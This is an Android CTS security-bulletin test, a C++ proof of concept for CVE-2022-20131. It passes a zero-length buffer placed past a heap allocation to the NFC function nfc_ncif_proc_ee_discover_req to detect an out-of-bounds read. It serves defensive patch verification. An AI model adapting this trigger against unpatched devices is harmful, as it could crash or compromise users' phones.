xref: /aosp_15_r20/cts/hostsidetests/securitybulletin/securityPatch/CVE-2022-20131/poc.cpp (revision b7c941bb3fa97aba169d73cee0bed2de8ac964bf)
1 /*
2  * Copyright (C) 2022 The Android Open Source Project
3  *
4  * Licensed under the Apache License, Version 2.0 (the "License");
5  * you may not use this file except in compliance with the License.
6  * You may obtain a copy of the License at
7  *
8  *      http://www.apache.org/licenses/LICENSE-2.0
9  *
10  * Unless required by applicable law or agreed to in writing, software
11  * distributed under the License is distributed on an "AS IS" BASIS,
12  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13  * See the License for the specific language governing permissions and
14  * limitations under the License.
15  */
16 
#include "../includes/common.h"
#include "../includes/memutils.h"

#include <nfc_int.h>
#include <rw_int.h>

#include <unistd.h>
22 
// Size in bytes of the heap buffer handed to the code under test.
constexpr size_t kBufferSize = 16;

// Selects which allocator hooks from memutils.h are active (the ENABLE_*
// flags come from that header); every hook starts out disabled.
char enable_selective_overload = ENABLE_NONE;

// True only while the call that exercises the patched code path is running;
// sigsegv_handler consults it to decide how a fault is treated.
bool isTestInProgress = false;

// Handler installed by main(), and the action it replaced (which the handler
// forwards to while the test window is open). Both are zero-initialized.
struct sigaction new_action = {};
struct sigaction old_action = {};
28 
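// SIGSEGV handler installed by main(). While the test window is open
// (isTestInProgress) a fault is handed to the action that was in place before
// this handler was installed, presumably so the crash surfaces the way it
// would without the handler; a fault at any other time is a defect in the PoC
// itself and terminates the process with EXIT_FAILURE.
//
// signum  - signal number delivered by the kernel.
// info    - siginfo for the fault; only si_signo is consulted.
// context - ucontext, passed through untouched.
void sigsegv_handler(int signum, siginfo_t *info, void *context) {
    if (isTestInProgress && info->si_signo == SIGSEGV) {
        // old_action is whatever sigaction() reported when main() installed
        // this handler. It is invoked through sa_sigaction without checking
        // SA_SIGINFO in old_action.sa_flags. NOTE(review): if the previous
        // action was SIG_DFL this is a call through a null pointer, which
        // re-faults while SIGSEGV is blocked — confirm the harness relies on
        // that.
        (*old_action.sa_sigaction)(signum, info, context);
        return;
    }
    // _exit() is async-signal-safe; exit() is not (it runs atexit handlers and
    // flushes stdio, which may go through the allocator hooks memutils.h
    // installs). The exit status is unchanged.
    _exit(EXIT_FAILURE);
}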
36 
// RW event callback registered through RW_SetActivatedTagType(). The test only
// verifies that the registration took (rw_cb.p_cback), so every event is
// deliberately ignored.
void poc_cback(tRW_EVENT /* event */, tRW_DATA* /* p_data */) {}
39 
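// Entry point for the CVE-2022-20131 regression test. It calls
// nfc_ncif_proc_ee_discover_req() with a zero-length buffer positioned at the
// very end of a heap allocation, so any read of the payload that is not bounded
// by bufLen lands outside the allocation, where it is presumably caught by the
// memutils.h hooks (enable_selective_overload) or by the SIGSEGV handler.
//
// Returns EXIT_SUCCESS when the call completes without a detected fault.
// FAIL_CHECK (from common.h) ends the process with a failure status when a
// precondition does not hold.
int main() {
    // Route SIGSEGV through sigsegv_handler and remember the previous action,
    // which the handler forwards to while the test window is open. A handler
    // that silently failed to install would change how a fault is reported,
    // so the sigaction() result is checked rather than assumed.
    sigemptyset(&new_action.sa_mask);
    new_action.sa_flags = SA_SIGINFO;
    new_action.sa_sigaction = sigsegv_handler;
    FAIL_CHECK(sigaction(SIGSEGV, &new_action, &old_action) == 0);

    // Register poc_cback as the RW callback for an ISO-DEP / Type A poll and
    // confirm the registration took. RW_SetActivatedTagType's status is not
    // checked; rw_cb.p_cback is the effect the test cares about.
    tNFC_ACTIVATE_DEVT p_activate_params = {};
    p_activate_params.protocol = NFC_PROTOCOL_ISO_DEP;
    p_activate_params.rf_tech_param.mode = NFC_DISCOVERY_TYPE_POLL_A;
    RW_SetActivatedTagType(&p_activate_params, &poc_cback);
    FAIL_CHECK(rw_cb.p_cback == &poc_cback);

    GKI_init();
    rw_init();

    // Order matters: the buffer is allocated after ENABLE_ALL so that the
    // memutils.h hooks see the allocation (presumably to track its bounds).
    uint16_t bufLen = 0;
    enable_selective_overload = ENABLE_ALL;
    uint8_t* buffer = (uint8_t*)malloc(sizeof(uint8_t) * kBufferSize);
    FAIL_CHECK(buffer);
    uint8_t* buffer_ptr = buffer;  // original pointer, kept for free()
    // Point one past the allocation: with bufLen == 0 the callee has nothing
    // valid to read, so any access through `buffer` is out of bounds.
    buffer = buffer + kBufferSize;

    // Only faults raised inside this window are forwarded to the previous
    // SIGSEGV action (see sigsegv_handler); a fault anywhere else is a bug in
    // the PoC. The hook mask is narrowed before the window closes so that the
    // free() below is still checked.
    isTestInProgress = true;
    nfc_ncif_proc_ee_discover_req(buffer, bufLen);
    enable_selective_overload = ENABLE_FREE_CHECK | ENABLE_REALLOC_CHECK;
    isTestInProgress = false;

    free(buffer_ptr);
    return EXIT_SUCCESS;
}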